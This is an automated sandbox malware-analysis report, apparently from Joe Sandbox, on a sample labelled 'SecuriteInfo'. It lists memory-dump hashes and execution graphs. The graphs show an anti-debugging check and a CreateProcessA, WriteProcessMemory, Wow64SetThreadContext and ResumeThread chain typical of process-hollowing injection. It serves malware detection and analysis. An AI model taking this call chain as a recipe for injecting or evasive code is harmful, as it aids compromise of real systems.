                                                              • Source File: 00000000.00000002.2143644029.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_115d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 228b84f39c06c961a4a6a875a5092dc00cfd1050b41964c829a6520a7aafe0b9
                                                              • Instruction ID: 6660494768d3306d4081eb0041aedda2d56460e4e34c7c7821ec5fd82b1dc7b0
                                                              • Opcode Fuzzy Hash: 228b84f39c06c961a4a6a875a5092dc00cfd1050b41964c829a6520a7aafe0b9
                                                              • Instruction Fuzzy Hash: 0B21FF71510244DFDF4ADFA8E980B26BF75FB88318F20C569ED090A256C33AD456CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2143714970.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_116d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f9c26c768f1c0036408991e2adc589f98ee27234be263f3f5e28850a10ee0d01
                                                              • Instruction ID: 5a5d9757f42fdfd1116acc9d41ac5526eb18e9b5f15e61e51d7865bd4d287892
                                                              • Opcode Fuzzy Hash: f9c26c768f1c0036408991e2adc589f98ee27234be263f3f5e28850a10ee0d01
                                                              • Instruction Fuzzy Hash: 8B212571604200DFCF19DF68E580B26BF69FB88314F20C56DD9890B256C33BD417CAA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2143714970.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_116d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c469e7fa6da0d306c3b44d75bfa7ce34782532fab4c5254ba72c8693e34cd3bd
                                                              • Instruction ID: 4bce57031fea105f5e4fbfdf38a87746bf117b3d64708db2f50fac7d4be0392e
                                                              • Opcode Fuzzy Hash: c469e7fa6da0d306c3b44d75bfa7ce34782532fab4c5254ba72c8693e34cd3bd
                                                              • Instruction Fuzzy Hash: C32192755093808FDB07CF24D994B15BF71EB46214F28C5DAD8898F2A7C33B981ACB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2143644029.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_115d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction ID: 76b10aaad5febf3db718fee73f33fcab3430a35ebc5bfe110e199dd0997702a3
                                                              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction Fuzzy Hash: 95119D76504280CFDF16CF54E5C4B16BF71FB88218F24C6A9DD490B656C336D45ACBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2143644029.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_115d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8dd55930b2f016d5d08595895bf87cfcea18a818e62e68b93cec766de54af148
                                                              • Instruction ID: 443ccae00aa70c980b395ccf793e23aa73016b5a21eab0115369472133fc00c2
                                                              • Opcode Fuzzy Hash: 8dd55930b2f016d5d08595895bf87cfcea18a818e62e68b93cec766de54af148
                                                              • Instruction Fuzzy Hash: 33012B31005784DAEB588BA9DD84B67FFDCEF45328F18C429ED184A283C3789840CB72
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2143644029.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_115d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c3676814866d5a602086b800ec8b8b3daa51a3593c662add5fe87c0ef3e1a0df
                                                              • Instruction ID: 70457dcc650dc7f2c366f4b59fe2125ff133c28cd5f97a1c1b70c4f8d54f4e99
                                                              • Opcode Fuzzy Hash: c3676814866d5a602086b800ec8b8b3daa51a3593c662add5fe87c0ef3e1a0df
                                                              • Instruction Fuzzy Hash: 65F0C271004384DAEB148A1ADC84B62FFE8EF85338F18C55AED584A283C3799840CB71
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2147454333.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_52b0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bb9134743ae4f373538c77b89c8c799da4e2c5cc803fdef5d0b352f8a857bcfa
                                                              • Instruction ID: 3babb44a206de5367365d4dd01b25e089279de3c1eeba78cf0018c67dd830285
                                                              • Opcode Fuzzy Hash: bb9134743ae4f373538c77b89c8c799da4e2c5cc803fdef5d0b352f8a857bcfa
                                                              • Instruction Fuzzy Hash: 801295B0C917468AE710CF25F9CC3893BB1B741318BD04A0ADA615B3F9D7B4196ACF68
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 57ab1f010be9568129faee30f1c7bb95f65fd1a5fed32ed4fd86a3aa6c7f6a0f
                                                              • Instruction ID: 3bf44f0be08efaf24157796d5c1ad6a37e388d96d1a26a5f3649c85081960a41
                                                              • Opcode Fuzzy Hash: 57ab1f010be9568129faee30f1c7bb95f65fd1a5fed32ed4fd86a3aa6c7f6a0f
                                                              • Instruction Fuzzy Hash: 1AE11AB4E111198FCB14DFA9C5809AEFBF6FF89305F248269D414AB35AD730A941CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f40791ae9eae35da00a4e14eddee682555e719aee61552ecad2ded41b9840298
                                                              • Instruction ID: 7027cdd9ff875cd26e06dbcf019d923c6626174029206e6e112740b6990be5c6
                                                              • Opcode Fuzzy Hash: f40791ae9eae35da00a4e14eddee682555e719aee61552ecad2ded41b9840298
                                                              • Instruction Fuzzy Hash: 5DE1EAB4E011198FDB14DFA9C5809AEFBF6BF89305F24C269D414AB35AD731A941CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bc46789079f2e42f369a5103a73408cd77fa1796b08dfa1060c181ec1dbdd06e
                                                              • Instruction ID: 80035562a49b584df8d86ad0cf563d039a893a12790b6e3ff243812c6131a43c
                                                              • Opcode Fuzzy Hash: bc46789079f2e42f369a5103a73408cd77fa1796b08dfa1060c181ec1dbdd06e
                                                              • Instruction Fuzzy Hash: 9CE1E9B4E011198FCB14DFA9C5809AEFBF6BF89305F24C26AD414AB35AD731A941CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8de848515d1198894b19b1f89a61309947af947816cdcc5d903b6cca739f85cc
                                                              • Instruction ID: d592af7ca8fc6ccd7774e16f0af2c12fb6309e1c2ad6c7d6dcb9c936287d2add
                                                              • Opcode Fuzzy Hash: 8de848515d1198894b19b1f89a61309947af947816cdcc5d903b6cca739f85cc
                                                              • Instruction Fuzzy Hash: E6E1D8B4E011198FCB14DFA9C5809AEFBF6BF89305F24C269D414AB35AD731A941CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5b4deb172b82625193b531568017f9ccbb1acb22192f8db70a3a1c299f18a91b
                                                              • Instruction ID: 7e1645d5474eea099b327f2b00fd6fb4aad7d3257e58bc1aac6b0fc42a58e31d
                                                              • Opcode Fuzzy Hash: 5b4deb172b82625193b531568017f9ccbb1acb22192f8db70a3a1c299f18a91b
                                                              • Instruction Fuzzy Hash: 73E10AB4E101198FCB14DFA9C5809AEFBF6BF89305F24C269D414AB35AD731A941CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2e4051ed4631a783e70621a614f013e572b40a756c52204a3f0d50c75e9d61ba
                                                              • Instruction ID: 3ab6ef1630a546cefafafb558e224cb2b4f943ace4f7d59825921d2e28a9729f
                                                              • Opcode Fuzzy Hash: 2e4051ed4631a783e70621a614f013e572b40a756c52204a3f0d50c75e9d61ba
                                                              • Instruction Fuzzy Hash: 07D1273192075A8ACB15EFA4D990A99F7B5FF95300F50DB9AD04937224EB70AAD4CF80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3953443ebf69a76376802d8fd78a6d672848ac33e01fbd5b069c487396349755
                                                              • Instruction ID: 1b4540641dff4233974b26cc1de70fff9d7b8803dfe3229689a460aa5d7bfe74
                                                              • Opcode Fuzzy Hash: 3953443ebf69a76376802d8fd78a6d672848ac33e01fbd5b069c487396349755
                                                              • Instruction Fuzzy Hash: AED1083192075A8ACB15EFA4D990A99F7B5FF95300F50DB9AD40937224EF70AAD4CF80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2147454333.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_52b0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b93da6c4ea096d3312e08e9c76901f768cd337ef20eebb09c36ea875ad35003e
                                                              • Instruction ID: fa5a372e59b5987f65f62ff6e9e5aed040aa1e64b40eba5da76d08376b8cb079
                                                              • Opcode Fuzzy Hash: b93da6c4ea096d3312e08e9c76901f768cd337ef20eebb09c36ea875ad35003e
                                                              • Instruction Fuzzy Hash: 23A14C36E10205CFCF16DFA5C8849EEB7B3FF84300B1545AAE906AB265DB71E955CB80
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2147454333.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_52b0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0b9b5c0c436edd684c9d88299ef7192ead2be52b145162ab3cfd53990555f753
                                                              • Instruction ID: 6b1b872a3adef75913bf4987298201e94c59d67dda8b8e2dd8fd4ee9029962a4
                                                              • Opcode Fuzzy Hash: 0b9b5c0c436edd684c9d88299ef7192ead2be52b145162ab3cfd53990555f753
                                                              • Instruction Fuzzy Hash: C7C1F9B0C917468AD714CF65F98C3893BB1BB85314F904A0AD9616B3F8DBB41C6ACF58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c154a87e8cbff885bf009ad6ed04f81e78769bae7ec5331be7d84b05f33397cd
                                                              • Instruction ID: 5b61fbfc0a316da3e6cdc6cb47a1c890a9b71f7ba6fd105d1d948c779a67eb00
                                                              • Opcode Fuzzy Hash: c154a87e8cbff885bf009ad6ed04f81e78769bae7ec5331be7d84b05f33397cd
                                                              • Instruction Fuzzy Hash: C751FBB0E012198FDB14DFA9C5809AEFBF6BF89305F24C16AD418AB356D7319941CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0bff71bd8e3efa378c506c78b0fa9d2f8efe6ad665e07fe65c111d5b72dc57b7
                                                              • Instruction ID: 6be17b96779e786adf437b1d4c1062c9264c144765c1139cfd7d8bcefd4822c0
                                                              • Opcode Fuzzy Hash: 0bff71bd8e3efa378c506c78b0fa9d2f8efe6ad665e07fe65c111d5b72dc57b7
                                                              • Instruction Fuzzy Hash: A9512CB1E102198FDB14DFA9C5805AEFBF6BF89301F24C16AD418A7356D731AA41CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2149731358.000000000B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B7F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b7f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8b1d71d0f981883616161a29cce988144b8b213821d913d21a39b706fa5bb205
                                                              • Instruction ID: 4fec486e575d5a679f661980c84a84b5dd043919ea9e40087efe10c4c4d8c9f7
                                                              • Opcode Fuzzy Hash: 8b1d71d0f981883616161a29cce988144b8b213821d913d21a39b706fa5bb205
                                                              • Instruction Fuzzy Hash: 1A41FC71D0A6688FEB29CF678C103D9BBF2AFC9300F04C1AAD548A6366D7340645CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:4.7%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:23.1%
                                                              Total number of Nodes:13
                                                              Total number of Limit Nodes:1
                                                              execution_graph 24999 6fdd878 25001 6fdd8a0 24999->25001 25003 6fdd8cc 24999->25003 25000 6fdd8a9 25001->25000 25004 6fdcd44 25001->25004 25005 6fdcd4f 25004->25005 25006 6fddbc3 25005->25006 25008 6fdcd60 25005->25008 25006->25003 25009 6fddbf8 OleInitialize 25008->25009 25010 6fddc5c 25009->25010 25010->25006 25011 30d70a8 25012 30d70a9 CheckRemoteDebuggerPresent 25011->25012 25014 30d712e 25012->25014

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 434 30d70a8-30d712c CheckRemoteDebuggerPresent 437 30d712e-30d7134 434->437 438 30d7135-30d7170 434->438 437->438
                                                              APIs
                                                              • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 030D711F
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3368331504.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_30d0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CheckDebuggerPresentRemote
                                                              • String ID:
                                                              • API String ID: 3662101638-0
                                                              • Opcode ID: aa54db8649fbaa9a464d32a488a70389123f97d546a1b51bc4681e4a9181c2e8
                                                              • Instruction ID: 3a5c13e09d112884da4ba307a470c8e6d33ddce74034310d9b456f882a3ded20
                                                              • Opcode Fuzzy Hash: aa54db8649fbaa9a464d32a488a70389123f97d546a1b51bc4681e4a9181c2e8
                                                              • Instruction Fuzzy Hash: 182137B19012598FCB10CFAAD884BEEFBF4EF49320F14845AE459A3250D778A944CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 425 30d70a0-30d70a2 426 30d70a9-30d712c CheckRemoteDebuggerPresent 425->426 427 30d70a4-30d70a8 425->427 430 30d712e-30d7134 426->430 431 30d7135-30d7170 426->431 427->426 430->431
                                                              APIs
                                                              • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 030D711F
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3368331504.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_30d0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CheckDebuggerPresentRemote
                                                              • String ID:
                                                              • API String ID: 3662101638-0
                                                              • Opcode ID: 080155ba4dd06bdf95237efdaea953489f004beb7a2f06d1f851f18452c0abeb
                                                              • Instruction ID: 82cf174f9c733f939b06db2e9f9fb38b55069c468ff350ae7cd55fb91441d38a
                                                              • Opcode Fuzzy Hash: 080155ba4dd06bdf95237efdaea953489f004beb7a2f06d1f851f18452c0abeb
                                                              • Instruction Fuzzy Hash: 5A2136B59012598FCB10CFAAD484BEEFBF8EF59320F14845AE458A3251D778A944CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 441 6fddbf0-6fddbf7 443 6fddbf8-6fddc5a OleInitialize 441->443 444 6fddc5c-6fddc62 443->444 445 6fddc63-6fddc80 443->445 444->445
                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 06FDDC4D
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3380614903.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_6fd0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Initialize
                                                              • String ID:
                                                              • API String ID: 2538663250-0
                                                              • Opcode ID: 3454cecb52a7b5efc9a0dfb9290b1add5b83d4db71d8b8920ba7868361398d55
                                                              • Instruction ID: 6fdae168874184ed73283680a875840a620f73caff9fdace6ff78c0dd7af42e5
                                                              • Opcode Fuzzy Hash: 3454cecb52a7b5efc9a0dfb9290b1add5b83d4db71d8b8920ba7868361398d55
                                                              • Instruction Fuzzy Hash: 751115B5D003488FDB20DF9AD584BDEFBF8EB48324F24841AD559A3610C778A544CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 448 6fdcd60-6fddc5a OleInitialize 450 6fddc5c-6fddc62 448->450 451 6fddc63-6fddc80 448->451 450->451
                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 06FDDC4D
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3380614903.0000000006FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_6fd0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Initialize
                                                              • String ID:
                                                              • API String ID: 2538663250-0
                                                              • Opcode ID: a2ca1cc1e58e5d94517ec3ef375e8b11ee59f4071c785dd400361db1863723a8
                                                              • Instruction ID: b225900f1b61765f7f0f736f883e7290295c681b6736b4318835bd93bb82cccc
                                                              • Opcode Fuzzy Hash: a2ca1cc1e58e5d94517ec3ef375e8b11ee59f4071c785dd400361db1863723a8
                                                              • Instruction Fuzzy Hash: 681112B5D007488FCB20DFAAD588BDEBBF8EF48324F248459D518A7210D779A944CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3367694728.000000000189D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0189D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_189d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fbcf3ec9ff621a86d517775289fee7907f3735dcf0b444aefd06ac59156ecb9d
                                                              • Instruction ID: bda60fa0dd74ef3fcc88b4959c2830e1fee85478359bda303f3c5632d29e52fb
                                                              • Opcode Fuzzy Hash: fbcf3ec9ff621a86d517775289fee7907f3735dcf0b444aefd06ac59156ecb9d
                                                              • Instruction Fuzzy Hash: 0A212271504204DFDF15DF98D9C0B26BFA5FB88318F28C66DD90A8B256C33AD506CA66
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.3367694728.000000000189D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0189D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_189d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction ID: ededfaf6699cb7d26a0eb8529dfa86478d5ea06d8dfeef58f5df12ccab59092f
                                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction Fuzzy Hash: E911BB75504280CFDB12CF58D5C4B15FFA1FB88314F28C6AAD8498B656C33AD44ACB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:10.9%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:184
                                                              Total number of Limit Nodes:15
                                                              execution_graph 25997 768c93c 25998 768c942 25997->25998 26004 768ea4e 25998->26004 26010 768e907 25998->26010 26017 768e9f0 25998->26017 26022 768e9e0 25998->26022 25999 768c850 26005 768e9dc 26004->26005 26007 768ea51 26004->26007 26027 768ed28 26005->26027 26044 768ed18 26005->26044 26006 768ea2e 26006->25999 26007->25999 26011 768e919 26010->26011 26013 768e984 26010->26013 26011->25999 26012 768e987 26012->25999 26013->26012 26015 768ed28 12 API calls 26013->26015 26016 768ed18 12 API calls 26013->26016 26014 768ea2e 26014->25999 26015->26014 26016->26014 26018 768e9f3 26017->26018 26020 768ed28 12 API calls 26018->26020 26021 768ed18 12 API calls 26018->26021 26019 768ea2e 26019->25999 26020->26019 26021->26019 26023 768e9e5 26022->26023 26025 768ed28 12 API calls 26023->26025 26026 768ed18 12 API calls 26023->26026 26024 768ea2e 26024->25999 26025->26024 26026->26024 26028 768ed3d 26027->26028 26029 768ed4f 26028->26029 26061 768ed68 26028->26061 26067 768f0f4 26028->26067 26072 768f2dd 26028->26072 26077 768f21d 26028->26077 26085 768f0fa 26028->26085 26089 768ed59 26028->26089 26095 768efa6 26028->26095 26100 768f004 26028->26100 26106 768f081 26028->26106 26111 768f1ef 26028->26111 26119 768f1ad 26028->26119 26123 768f4ac 26028->26123 26128 768f3eb 26028->26128 26133 768f429 26028->26133 26029->26006 26045 768ecb7 26044->26045 26046 768ed4f 26045->26046 26047 768ed68 2 API calls 26045->26047 26048 768f429 2 API calls 26045->26048 26049 768f3eb 2 API calls 26045->26049 26050 768f4ac 2 API calls 26045->26050 26051 768f1ad 2 API calls 26045->26051 26052 768f1ef 4 API calls 26045->26052 26053 768f081 2 API calls 26045->26053 26054 768f004 2 API calls 26045->26054 26055 768efa6 2 API calls 26045->26055 26056 768ed59 2 API calls 26045->26056 26057 768f0fa 2 API calls 26045->26057 26058 768f21d 4 API calls 26045->26058 26059 768f2dd 2 API calls 26045->26059 26060 768f0f4 2 API calls 26045->26060 26046->26006 26047->26046 26048->26046 26049->26046 26050->26046 26051->26046 26052->26046 26053->26046 26054->26046 26055->26046 26056->26046 26057->26046 26058->26046 26059->26046 26060->26046 26063 768ed6b 26061->26063 26062 768f988 26062->26029 26063->26062 26138 768c430 26063->26138 26142 768c424 26063->26142 26068 768f855 26067->26068 26146 768c008 26068->26146 26150 768c010 26068->26150 26069 768f870 26073 768f2e3 26072->26073 26154 768c1a8 26073->26154 26158 768c1a1 26073->26158 26074 768f315 26074->26029 26078 768f22a 26077->26078 26083 768c008 Wow64SetThreadContext 26078->26083 26084 768c010 Wow64SetThreadContext 26078->26084 26079 768efae 26080 768efc0 26079->26080 26081 768c1a8 WriteProcessMemory 26079->26081 26082 768c1a1 WriteProcessMemory 26079->26082 26080->26029 26081->26079 26082->26079 26083->26079 26084->26079 26087 768c1a8 WriteProcessMemory 26085->26087 26088 768c1a1 WriteProcessMemory 26085->26088 26086 768f128 26086->26029 26087->26086 26088->26086 26090 768ed5c 26089->26090 26091 768ecf7 26090->26091 26093 768c430 CreateProcessA 26090->26093 26094 768c424 CreateProcessA 26090->26094 26091->26029 26092 768ef86 26092->26029 26093->26092 26094->26092 26096 768efae 26095->26096 26097 768efc0 26096->26097 26098 768c1a8 WriteProcessMemory 26096->26098 26099 768c1a1 WriteProcessMemory 26096->26099 26097->26029 26098->26096 26099->26096 26101 768f022 26100->26101 26102 768f54c 26101->26102 26162 768bf58 26101->26162 26166 768bf60 26101->26166 26102->26029 26103 768f0c1 26103->26029 26107 768f094 26106->26107 26109 768bf58 ResumeThread 26107->26109 26110 768bf60 ResumeThread 26107->26110 26108 768f0c1 26108->26029 26109->26108 26110->26108 26112 768f1fc 26111->26112 26117 768c008 Wow64SetThreadContext 26112->26117 26118 768c010 Wow64SetThreadContext 26112->26118 26113 768efae 26114 768efc0 26113->26114 26115 768c1a8 WriteProcessMemory 26113->26115 26116 768c1a1 WriteProcessMemory 26113->26116 26114->26029 26115->26113 26116->26113 26117->26113 26118->26113 26170 768c0e8 26119->26170 26174 768c0e0 26119->26174 26120 768f1cb 26126 768c1a8 WriteProcessMemory 26123->26126 26127 768c1a1 WriteProcessMemory 26123->26127 26124 768efae 26124->26123 26125 768efc0 26124->26125 26125->26029 26126->26124 26127->26124 26129 768f2f4 26128->26129 26130 768f315 26129->26130 26131 768c1a8 WriteProcessMemory 26129->26131 26132 768c1a1 WriteProcessMemory 26129->26132 26130->26029 26131->26130 26132->26130 26134 768f88f 26133->26134 26178 768c298 26134->26178 26182 768c291 26134->26182 26135 768f8b1 26139 768c437 CreateProcessA 26138->26139 26141 768c67b 26139->26141 26143 768c428 CreateProcessA 26142->26143 26145 768c67b 26143->26145 26147 768c010 Wow64SetThreadContext 26146->26147 26149 768c09d 26147->26149 26149->26069 26151 768c055 Wow64SetThreadContext 26150->26151 26153 768c09d 26151->26153 26153->26069 26155 768c1f0 WriteProcessMemory 26154->26155 26157 